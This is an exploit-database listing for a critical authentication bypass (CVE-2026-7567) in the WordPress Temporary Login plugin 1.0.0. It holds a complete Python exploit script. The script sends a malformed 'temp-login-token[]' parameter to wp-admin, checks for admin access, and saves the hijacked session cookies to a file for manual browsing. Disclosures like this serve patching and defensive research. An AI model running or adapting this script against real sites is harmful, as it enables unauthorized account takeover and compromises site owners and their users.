EXPLOITDB 9.8 CRITICAL

WordPress Temporary Login Plugin 1.0.0 – 'temp-login-token' Authentication Bypass to Account Takeover_EDB-ID:52575

May 26, 2026 invoker category_exploit
9.8 / 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

Exploit Title: Wordpress Temporary Login Plugin 1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover Date: 2026-05-02 Exploit Author: Amir Hossein Jamshidi Vendor Homepage: https://wordpress.org Software Link:...
Visit Original Source

Basic Information

ID EDB-ID:52575
Published May 26, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: Wordpress Temporary Login Plugin 1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover
# Date: 2026-05-02
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://wordpress.org
# Software Link: https://downloads.wordpress.org/plugin/temporary-login.1.0.0.zip
# Version: <= 1.0.0
# Tested on: Linux
# CVE : CVE-2026-7567


#!/usr/bin/env python3
import requests

print('''
#################################################################################
# Temporary Login Plugin <= 1.0.0 - 'temp-login-token' Authentication Bypass #
# BY: Amir Hossein Jamshidi #
# Mail: [email protected] #
# github: https://github.com/amirhosseinjamshidi64 #
# Usage: python Exploit.py #
#################################################################################
''')

# Target URL - CHANGE THIS to your WordPress URL
target = input("Enter Target (example: https://evil.com/): ")
url = target + "wp-admin/?temp-login-token[]"
print("[*] Sending exploit request...")
response = requests.get(url, allow_redirects=True)

print(f"[*] Final URL: {response.url}")
print(f"[*] Response status: {response.status_code}")

# Check if we got admin cookies
if 'wp-settings-time' in str(response.cookies):
print("[✓] SUCCESS! Authentication bypassed!")
print("[✓] WordPress logged-in cookie found")
# Try to access admin area with the same session
admin_check = requests.get(
response.url.replace('wp-login.php', 'wp-admin/'),
cookies=response.cookies
)
if 'Dashboard' in admin_check.text or 'wp-admin' in admin_check.url:
print("[✓] Full admin access confirmed!")
print("[✓] You are now logged in as a temporary user")
else:
print("[!] Logged in but no admin access (user may have limited role)")
else:
print("[-] Exploit failed. Reasons:")
print(" - Plugin not installed or not version 1.0.0")
print(" - No temporary users exist")
print(" - Plugin is patched")
# Save cookies for manual browsing
with open('wordpress_cookies.txt', 'w') as f:
for cookie in response.cookies:
f.write(f"{cookie.name}={cookie.value}\n")
print("[*] Cookies saved to wordpress_cookies.txt")

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.